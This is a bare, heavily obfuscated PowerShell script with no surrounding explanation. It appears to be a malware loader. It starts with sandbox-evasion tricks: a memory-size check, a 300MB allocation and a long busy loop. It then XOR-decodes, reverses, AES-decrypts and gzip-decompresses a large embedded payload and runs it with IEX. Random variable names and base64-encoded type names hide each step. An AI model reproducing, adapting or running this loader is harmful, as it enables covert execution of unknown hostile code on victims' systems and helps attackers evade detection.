$vpwnkqnpxtghzphk = (Get-Process -Id $PID | Select-Object Name,@{Name="WorkingSet";Expression={($_.ws / 1024kb)}}).WorkingSet
if ($vpwnkqnpxtghzphk -lt 250) { $rkntggyvwvpokxrx = "a" * 300MB }
$ytuvrtwsrnvkyv = 0
$isqniuszhqpiqk = 30000000
For ($ytuvrtwsrnvkyv=0; $ytuvrtwsrnvkyv -lt $isqniuszhqpiqk;$ytuvrtwsrnvkyv++) { $ytuvrtwsrnvkyv++ }
$zhgqxjpionx = [System.Text.Encoding]::UTF8.GetBytes("gnyykxrzyn")
$sjprkhviktswugiq = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("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"))
$xnkygjjhtu = [System.Text.Encoding]::UTF8.GetBytes($sjprkhviktswugiq)
$nowwoqtpxsp = $(for ($imhwiprgnmgx = 0; $imhwiprgnmgx -lt $xnkygjjhtu.length; ) {
    for ($zozyxpyiuxznqpnx = 0; $zozyxpyiuxznqpnx -lt $zhgqxjpionx.length; $zozyxpyiuxznqpnx++) {
        $xnkygjjhtu[$imhwiprgnmgx] -bxor $zhgqxjpionx[$zozyxpyiuxznqpnx]
        $imhwiprgnmgx++
        if ($imhwiprgnmgx -ge $xnkygjjhtu.Length) {
            $zozyxpyiuxznqpnx = $zhgqxjpionx.length
        }
    }
})
$nowwoqtpxsp = [System.Text.Encoding]::UTF8.GetString($nowwoqtpxsp)
$tnuttjwpyunp = "$nowwoqtpxsp"
$xprtkzsnqmzzojuvx = $tnuttjwpyunp.ToCharArray()
[array]::Reverse($xprtkzsnqmzzojuvx)
$ugqhtqutszmr = -join($xprtkzsnqmzzojuvx)
$jvukvjrnnjmp = [System.Convert]::FromBase64String("$ugqhtqutszmr")
$qohhvtprggkwqupg = [System.Convert]::FromBase64String("aoJwwAdabF77fcV1tnZqHv/LWvJk3h/kexusY8id6gE=")
$orvovixmmmnhi = "==gCkV2Zh5WYNNXZB5SeoBXYyd2b0BXeyNkL5RXayV3YlNlLtVGdzl3U"
$twgxmhmkqhhzpskki = $orvovixmmmnhi.ToCharArray()
[array]::Reverse($twgxmhmkqhhzpskki)
$wzspyjhjqzwoyzz = -join($twgxmhmkqhhzpskki)
$wortnjovgz = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($wzspyjhjqzwoyzz))
$hkvhwopqyjtrsqoxm = New-Object "$wortnjovgz"
$rwqtwkmkgihuvqx = "==wQCNkO60VZk9WTyVGawl2QukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W"
$jsqnwqkwuyspy = $rwqtwkmkgihuvqx.ToCharArray()
[array]::Reverse($jsqnwqkwuyspy)
$phwkmmyoivg = -join($jsqnwqkwuyspy)
$mjpyhpvijsguz = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($phwkmmyoivg))
$uzksytzunkjrzk = & ([scriptblock]::Create($mjpyhpvijsguz))
$hkvhwopqyjtrsqoxm.Mode = $uzksytzunkjrzk
$thjwpvkyoiqonu = "==wNTN0SQpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W"
$ktirruhqpjqnm = $thjwpvkyoiqonu.ToCharArray()
[array]::Reverse($ktirruhqpjqnm)
$hsgihuknnsu = -join($ktirruhqpjqnm)
$mwskogsvyk = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hsgihuknnsu))
$wyoxtspsqiqijzqyp = & ([scriptblock]::Create($mwskogsvyk))
$hkvhwopqyjtrsqoxm.Padding = $wyoxtspsqiqijzqyp
$hkvhwopqyjtrsqoxm.BlockSize = 128
$hkvhwopqyjtrsqoxm.KeySize = 192
$hkvhwopqyjtrsqoxm.Key = $qohhvtprggkwqupg
$hkvhwopqyjtrsqoxm.IV = $jvukvjrnnjmp[0..15]
$honvizhwjwxrnnpgj = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("U3lzdGVtLklPLk1lbW9yeVN0cmVhbQ=="))
$ohpqksynpynxn = New-Object $honvizhwjwxrnnpgj(,$hkvhwopqyjtrsqoxm.CreateDecryptor().TransformFinalBlock($jvukvjrnnjmp,16,$jvukvjrnnjmp.Length-16))
$qhttmnojqkyoun = New-Object $honvizhwjwxrnnpgj
$znutyvgkzokpn = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("RGVjb21wcmVzcw=="))
$wugoiuvuozg = & ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("W0lPLkNvbXByZXNzaW9uLkNvbXByZXNzaW9uTW9kZV0="))))
$qittqmgnkjqxruy = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("U3lzdGVtLklPLkNvbXByZXNzaW9uLkd6aXBTdHJlYW0="))
$wkymwxnvvpqkjpvp = New-Object $qittqmgnkjqxruy $ohpqksynpynxn, ($wugoiuvuozg::$znutyvgkzokpn)
$wkymwxnvvpqkjpvp.CopyTo($qhttmnojqkyoun)
$wkymwxnvvpqkjpvp.Close()
$hkvhwopqyjtrsqoxm.Dispose()
$ohpqksynpynxn.Close()
$kzxovjsvzwqogkrtz = & ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("W1N5c3RlbS5UZXh0LkVuY29kaW5nXQ=="))))
$qiutoimpjpskux = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("VVRGOA=="))
$jymouvpsnmtym = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("VG9BcnJheQ=="))
$hhjuvgmqxmtsjzmz = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("R2V0U3RyaW5n"))
$rrjhroggkhrpquv = $kzxovjsvzwqogkrtz::$qiutoimpjpskux.$hhjuvgmqxmtsjzmz($qhttmnojqkyoun.$jymouvpsnmtym())
IEX($rrjhroggkhrpquv)
